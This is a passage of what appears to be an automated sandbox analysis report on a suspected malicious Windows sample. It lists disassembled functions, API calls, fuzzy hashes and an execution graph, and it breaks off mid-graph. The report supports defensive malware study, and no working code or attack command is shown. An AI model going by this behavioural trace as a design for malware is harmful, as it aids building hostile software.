                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                              • free.MSVCRT ref: 0040B224
                                                                                                              • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 726966127-0
                                                                                                              • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                              • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                              Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$memcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 231171946-0
                                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                              Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3669619086-0
                                                                                                              • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                              • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                              Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                              • free.MSVCRT ref: 00417425
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2605342592-0
                                                                                                              • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                              • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                              Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 1961120804-0
                                                                                                              • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                              • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.4%
                                                                                                              Dynamic/Decrypted Code Coverage:20%
                                                                                                              Signature Coverage:0.5%
                                                                                                              Total number of Nodes:867
                                                                                                              Total number of Limit Nodes:21
                                                                                                              execution_graph 34100 40fc40 70 API calls 34273 403640 21 API calls 34101 427fa4 42 API calls 34274 412e43 _endthreadex 34275 425115 76 API calls __fprintf_l 34276 43fe40 133 API calls 34104 425115 83 API calls __fprintf_l 34105 401445 memcpy memcpy DialogBoxParamA 34106 440c40 34 API calls 34108 411853 RtlInitializeCriticalSection memset 34109 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34282 40a256 13 API calls 34284 432e5b 17 API calls 34286 43fa5a 20 API calls 34111 401060 41 API calls 34289 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34291 405e69 14 API calls 34116 433068 15 API calls __fprintf_l 34293 414a6d 18 API calls 34294 43fe6f 134 API calls 34118 424c6d 15 API calls __fprintf_l 34295 426741 19 API calls 34120 440c70 17 API calls 34121 443c71 44 API calls 34124 427c79 24 API calls 34298 416e7e memset __fprintf_l 34128 42800b 47 API calls 34129 425115 85 API calls __fprintf_l 34301 41960c 61 API calls 34130 43f40c 122 API calls __fprintf_l 34133 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34134 43f81a 20 API calls 34136 414c20 memset memset 34137 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34305 414625 18 API calls 34306 404225 modf 34307 403a26 strlen WriteFile 34309 40422a 12 API calls 34313 427632 memset memset memcpy 34314 40ca30 59 API calls 34315 404235 26 API calls 34138 42ec34 61 API calls __fprintf_l 34139 425115 76 API calls __fprintf_l 34316 425115 77 API calls __fprintf_l 34318 44223a 38 API calls 34145 43183c 112 API calls 34319 44b2c5 _onexit __dllonexit 34324 42a6d2 memcpy __allrem 34147 405cda 65 API calls 34332 43fedc 138 API calls 34333 4116e1 16 API calls __fprintf_l 34150 4244e6 19 API calls 34152 42e8e8 127 API calls __fprintf_l 34153 4118ee RtlLeaveCriticalSection 34338 43f6ec 22 API calls 34155 425115 119 API calls __fprintf_l 33158 410cf3 EnumResourceNamesA 34341 4492f0 memcpy memcpy 34343 43fafa 18 API calls 34345 4342f9 15 API calls __fprintf_l 34156 4144fd 19 API calls 34347 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34348 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34351 443a84 _mbscpy 34353 43f681 17 API calls 34159 404487 22 API calls 34355 415e8c 16 API calls __fprintf_l 34163 411893 RtlDeleteCriticalSection __fprintf_l 34164 41a492 42 API calls 34359 403e96 34 API calls 34360 410e98 memset SHGetPathFromIDList SendMessageA 34166 426741 109 API calls __fprintf_l 34167 4344a2 18 API calls 34168 4094a2 10 API calls 34363 4116a6 15 API calls __fprintf_l 34364 43f6a4 17 API calls 34365 440aa3 20 API calls 34367 427430 45 API calls 34171 4090b0 7 API calls 34172 4148b0 15 API calls 34174 4118b4 RtlEnterCriticalSection 34175 4014b7 CreateWindowExA 34176 40c8b8 19 API calls 34178 4118bf RtlTryEnterCriticalSection 34372 42434a 18 API calls __fprintf_l 34374 405f53 12 API calls 34186 43f956 59 API calls 34188 40955a 17 API calls 34189 428561 36 API calls 34190 409164 7 API calls 34378 404366 19 API calls 34382 40176c ExitProcess 34385 410777 42 API calls 34195 40dd7b 51 API calls 34196 425d7c 16 API calls __fprintf_l 34387 43f6f0 25 API calls 34388 42db01 22 API calls 34197 412905 15 API calls __fprintf_l 34389 403b04 54 API calls 34390 405f04 SetDlgItemTextA GetDlgItemTextA 34391 44b301 ??3@YAXPAX 34394 4120ea 14 API calls 3 library calls 34395 40bb0a 8 API calls 34397 413f11 strcmp 34201 434110 17 API calls __fprintf_l 34204 425115 108 API calls __fprintf_l 34398 444b11 _onexit 34206 425115 76 API calls __fprintf_l 34209 429d19 10 API calls 34401 444b1f __dllonexit 34402 409f20 _strcmpi 34211 42b927 31 API calls 34405 433f26 19 API calls __fprintf_l 34406 44b323 FreeLibrary 34407 427f25 46 API calls 34408 43ff2b 17 API calls 34409 43fb30 19 API calls 34218 414d36 16 API calls 34220 40ad38 7 API calls 34411 433b38 16 API calls __fprintf_l 34091 44b33b 34092 44b344 ??3@YAXPAX 34091->34092 34093 44b34b 34091->34093 34092->34093 34094 44b354 ??3@YAXPAX 34093->34094 34095 44b35b 34093->34095 34094->34095 34096 44b364 ??3@YAXPAX 34095->34096 34097 44b36b 34095->34097 34096->34097 34098 44b374 ??3@YAXPAX 34097->34098 34099 44b37b 34097->34099 34098->34099 34224 426741 21 API calls 34225 40c5c3 125 API calls 34227 43fdc5 17 API calls 34412 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34230 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 775 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 775 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33286 410d0e 33230->33286 33232 40cf6f 33290 40ccd7 ??2@YAPAXI 33232->33290 33234 40cf9b 33304 407cbc 33234->33304 33239 40cfc4 33322 409825 memset 33239->33322 33240 40cfd8 33327 4096f4 memset 33240->33327 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33351 407948 free free 33247->33351 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33352 4080d4 free 33253->33352 33256 40d0a0 CoInitialize 33254->33256 33332 40ce70 33254->33332 33255->33245 33349 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33349 33260 40d1cd 33353 407948 free free 33260->33353 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33350 40c256 PostMessageA 33262->33350 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404ae8 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33284 404b13 33281->33284 33285 404afc MessageBoxA 33281->33285 33282->33283 33283->33281 33284->33230 33285->33230 33287 410d17 LoadLibraryA 33286->33287 33288 410d3c 33286->33288 33287->33288 33289 410d2b GetProcAddress 33287->33289 33288->33232 33289->33288 33291 40cd08 ??2@YAPAXI 33290->33291 33293 40cd26 33291->33293 33294 40cd2d 33291->33294 33361 404025 6 API calls 33293->33361 33296 40cd66 33294->33296 33297 40cd59 DeleteObject 33294->33297 33354 407088 33296->33354 33297->33296 33299 40cd6b 33357 4019b5 33299->33357 33302 4019b5 strncat 33303 40cdbf _mbscpy 33302->33303 33303->33234 33363 407948 free free 33304->33363 33306 407cf7 33309 407a1f malloc memcpy free free 33306->33309 33310 407ddc 33306->33310 33312 407d7a free 33306->33312 33317 407e04 33306->33317 33367 40796e 7 API calls 33306->33367 33368 406f30 33306->33368 33309->33306 33310->33317 33376 407a1f 33310->33376 33312->33306 33364 407a55 33317->33364 33318 407e30 33319 407e57 33318->33319 33320 407e38 33318->33320 33319->33239 33319->33240 33320->33319 33321 407e41 _strcmpi 33320->33321 33321->33319 33321->33320 33382 4097ff 33322->33382 33324 409854 33387 409731 33324->33387 33328 4097ff 3 API calls 33327->33328 33329 409723 33328->33329 33407 40966c 33329->33407 33421 4023b2 33332->33421 33337 40ced3 33510 40cdda 7 API calls 33337->33510 33338 40cece 33342 40cf3f 33338->33342 33462 40c3d0 memset GetModuleFileNameA strrchr 33338->33462 33342->33264 33342->33265 33345 40ceed 33489 40affa 33345->33489 33349->33262 33350->33271 33351->33253 33352->33260 33353->33267 33362 406fc7 memset _mbscpy 33354->33362 33356 40709f CreateFontIndirectA 33356->33299 33358 4019e1 33357->33358 33359 4019c2 strncat 33358->33359 33360 4019e5 memset LoadIconA 33358->33360 33359->33358 33360->33302 33361->33294 33362->33356 33363->33306 33365 407a65 33364->33365 33366 407a5b free 33364->33366 33365->33318 33366->33365 33367->33306 33369 406f37 malloc 33368->33369 33370 406f7d 33368->33370 33372 406f73 33369->33372 33373 406f58 33369->33373 33370->33306 33372->33306 33374 406f6c free 33373->33374 33375 406f5c memcpy 33373->33375 33374->33372 33375->33374 33377 407a38 33376->33377 33378 407a2d free 33376->33378 33380 406f30 3 API calls 33377->33380 33379 407a43 33378->33379 33381 40796e 7 API calls 33379->33381 33380->33379 33381->33317 33398 406f96 GetModuleFileNameA 33382->33398 33384 409805 strrchr 33385 409814 33384->33385 33386 409817 _mbscat 33384->33386 33385->33386 33386->33324 33399 44b090 33387->33399 33392 40930c 3 API calls 33393 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33392->33393 33394 4097c5 LoadStringA 33393->33394 33395 4097db 33394->33395 33395->33394 33397 4097f3 33395->33397 33406 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33395->33406 33397->33245 33398->33384 33400 40973e _mbscpy _mbscpy 33399->33400 33401 40930c 33400->33401 33402 44b090 33401->33402 33403 409319 memset GetPrivateProfileStringA 33402->33403 33404 409374 33403->33404 33405 409364 WritePrivateProfileStringA 33403->33405 33404->33392 33405->33404 33406->33395 33417 406f81 GetFileAttributesA 33407->33417 33409 409675 33410 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33409->33410 33416 4096ee 33409->33416 33418 409278 GetPrivateProfileStringA 33410->33418 33412 4096c9 33419 409278 GetPrivateProfileStringA 33412->33419 33414 4096da 33420 409278 GetPrivateProfileStringA 33414->33420 33416->33246 33417->33409 33418->33412 33419->33414 33420->33416 33512 409c1c 33421->33512 33424 401e69 memset 33551 410dbb 33424->33551 33427 401ec2 33581 4070e3 strlen _mbscat _mbscpy _mbscat 33427->33581 33428 401ed4 33566 406f81 GetFileAttributesA 33428->33566 33431 401ee6 strlen strlen 33433 401f15 33431->33433 33434 401f28 33431->33434 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33433->33582 33567 406f81 GetFileAttributesA 33434->33567 33437 401f35 33568 401c31 33437->33568 33440 401f75 33580 410a9c RegOpenKeyExA 33440->33580 33441 401c31 7 API calls 33441->33440 33443 401f91 33444 402187 33443->33444 33445 401f9c memset 33443->33445 33447 402195 ExpandEnvironmentStringsA 33444->33447 33448 4021a8 _strcmpi 33444->33448 33583 410b62 RegEnumKeyExA 33445->33583 33592 406f81 GetFileAttributesA 33447->33592 33448->33337 33448->33338 33450 40217e RegCloseKey 33450->33444 33451 401fd9 atoi 33452 401fef memset memset sprintf 33451->33452 33460 401fc9 33451->33460 33584 410b1e 33452->33584 33455 402165 33455->33450 33456 402076 memset memset strlen strlen 33456->33460 33457 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33460 33458 4020dd strlen strlen 33458->33460 33459 406f81 GetFileAttributesA 33459->33460 33460->33450 33460->33451 33460->33455 33460->33456 33460->33457 33460->33458 33460->33459 33461 402167 _mbscpy 33460->33461 33591 410b62 RegEnumKeyExA 33460->33591 33461->33450 33463 40c422 33462->33463 33464 40c425 _mbscat _mbscpy _mbscpy 33462->33464 33463->33464 33465 40c49d 33464->33465 33466 40c512 33465->33466 33467 40c502 GetWindowPlacement 33465->33467 33468 40c538 33466->33468 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33466->33613 33467->33466 33606 409b31 33468->33606 33472 40ba28 33473 40ba87 33472->33473 33479 40ba3c 33472->33479 33616 406c62 LoadCursorA SetCursor 33473->33616 33475 40ba8c 33617 410a9c RegOpenKeyExA 33475->33617 33618 404785 33475->33618 33621 403c16 33475->33621 33697 4107f1 33475->33697 33700 404734 33475->33700 33476 40ba43 _mbsicmp 33476->33479 33477 40baa0 33478 407e30 _strcmpi 33477->33478 33482 40bab0 33478->33482 33479->33473 33479->33476 33708 40b5e5 10 API calls 33479->33708 33480 40bafa SetCursor 33480->33345 33482->33480 33483 40baf1 qsort 33482->33483 33483->33480 34066 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33489->34066 33491 40b00e 33492 40b016 33491->33492 33493 40b01f GetStdHandle 33491->33493 34067 406d1a CreateFileA 33492->34067 33495 40b01c 33493->33495 33496 40b035 33495->33496 33497 40b12d 33495->33497 34068 406c62 LoadCursorA SetCursor 33496->34068 34072 406d77 9 API calls 33497->34072 33500 40b136 33511 40c580 28 API calls 33500->33511 33501 40b087 33508 40b0a1 33501->33508 34070 40a699 12 API calls 33501->34070 33502 40b042 33502->33501 33502->33508 34069 40a57c strlen WriteFile 33502->34069 33505 40b0d6 33506 40b116 CloseHandle 33505->33506 33507 40b11f SetCursor 33505->33507 33506->33507 33507->33500 33508->33505 34071 406d77 9 API calls 33508->34071 33510->33338 33511->33342 33524 409a32 33512->33524 33515 409c80 memcpy memcpy 33516 409cda 33515->33516 33516->33515 33517 409d18 ??2@YAPAXI ??2@YAPAXI 33516->33517 33518 408db6 12 API calls 33516->33518 33520 409d54 ??2@YAPAXI 33517->33520 33521 409d8b 33517->33521 33518->33516 33520->33521 33521->33521 33534 409b9c 33521->33534 33523 4023c1 33523->33424 33525 409a44 33524->33525 33526 409a3d ??3@YAXPAX 33524->33526 33527 409a52 33525->33527 33528 409a4b ??3@YAXPAX 33525->33528 33526->33525 33529 409a63 33527->33529 33530 409a5c ??3@YAXPAX 33527->33530 33528->33527 33531 409a83 ??2@YAPAXI ??2@YAPAXI 33529->33531 33532 409a73 ??3@YAXPAX 33529->33532 33533 409a7c ??3@YAXPAX 33529->33533 33530->33529 33531->33515 33532->33533 33533->33531 33535 407a55 free 33534->33535 33536 409ba5 33535->33536 33537 407a55 free 33536->33537 33538 409bad 33537->33538 33539 407a55 free 33538->33539 33540 409bb5 33539->33540 33541 407a55 free 33540->33541 33542 409bbd 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bd0 33543->33544 33545 407a1f 4 API calls 33544->33545 33546 409bda 33545->33546 33547 407a1f 4 API calls 33546->33547 33548 409be4 33547->33548 33549 407a1f 4 API calls 33548->33549 33550 409bee 33549->33550 33550->33523 33552 410d0e 2 API calls 33551->33552 33553 410dca 33552->33553 33554 410dfd memset 33553->33554 33593 4070ae 33553->33593 33556 410e1d 33554->33556 33596 410a9c RegOpenKeyExA 33556->33596 33559 401e9e strlen strlen 33559->33427 33559->33428 33560 410e4a 33561 410e7f _mbscpy 33560->33561 33597 410d3d _mbscpy 33560->33597 33561->33559 33563 410e5b 33598 410add RegQueryValueExA 33563->33598 33565 410e73 RegCloseKey 33565->33561 33566->33431 33567->33437 33599 410a9c RegOpenKeyExA 33568->33599 33570 401c4c 33571 401cad 33570->33571 33600 410add RegQueryValueExA 33570->33600 33571->33440 33571->33441 33573 401c6a 33574 401c71 strchr 33573->33574 33575 401ca4 RegCloseKey 33573->33575 33574->33575 33576 401c85 strchr 33574->33576 33575->33571 33576->33575 33577 401c94 33576->33577 33601 406f06 strlen 33577->33601 33579 401ca1 33579->33575 33580->33443 33581->33428 33582->33434 33583->33460 33604 410a9c RegOpenKeyExA 33584->33604 33586 410b34 33587 410b5d 33586->33587 33605 410add RegQueryValueExA 33586->33605 33587->33460 33589 410b4c RegCloseKey 33589->33587 33591->33460 33592->33448 33594 4070bd GetVersionExA 33593->33594 33595 4070ce 33593->33595 33594->33595 33595->33554 33595->33559 33596->33560 33597->33563 33598->33565 33599->33570 33600->33573 33602 406f17 33601->33602 33603 406f1a memcpy 33601->33603 33602->33603 33603->33579 33604->33586 33605->33589 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33472 33615 409868 SendMessageA 33611->33615 33613->33468 33614->33609 33615->33610 33616->33475 33617->33477 33619 4047a3 33618->33619 33620 404799 FreeLibrary 33618->33620 33619->33477 33620->33619 33622 4107f1 FreeLibrary 33621->33622 33623 403c30 LoadLibraryA 33622->33623 33624 403c74 33623->33624 33625 403c44 GetProcAddress 33623->33625 33627 4107f1 FreeLibrary 33624->33627 33625->33624 33626 403c5e 33625->33626 33626->33624 33630 403c6b 33626->33630 33628 403c7b 33627->33628 33629 404734 3 API calls 33628->33629 33631 403c86 33629->33631 33630->33628 33709 4036e5 33631->33709 33634 4036e5 27 API calls 33635 403c9a 33634->33635 33636 4036e5 27 API calls 33635->33636 33637 403ca4 33636->33637 33638 4036e5 27 API calls 33637->33638 33639 403cae 33638->33639 33721 4085d2 33639->33721 33647 403ce5 33648 403cf7 33647->33648 33902 402bd1 40 API calls 33647->33902 33767 410a9c RegOpenKeyExA 33648->33767 33651 403d0a 33652 403d1c 33651->33652 33903 402bd1 40 API calls 33651->33903 33768 402c5d 33652->33768 33656 4070ae GetVersionExA 33657 403d31 33656->33657 33786 410a9c RegOpenKeyExA 33657->33786 33659 403d51 33660 403d61 33659->33660 33904 402b22 47 API calls 33659->33904 33787 410a9c RegOpenKeyExA 33660->33787 33663 403d87 33664 403d97 33663->33664 33905 402b22 47 API calls 33663->33905 33788 410a9c RegOpenKeyExA 33664->33788 33667 403dbd 33668 403dcd 33667->33668 33906 402b22 47 API calls 33667->33906 33789 410808 33668->33789 33672 404785 FreeLibrary 33673 403de8 33672->33673 33793 402fdb 33673->33793 33676 402fdb 34 API calls 33677 403e00 33676->33677 33809 4032b7 33677->33809 33686 403e3b 33688 403e73 33686->33688 33689 403e46 _mbscpy 33686->33689 33856 40fb00 33688->33856 33908 40f334 334 API calls 33689->33908 33698 410807 33697->33698 33699 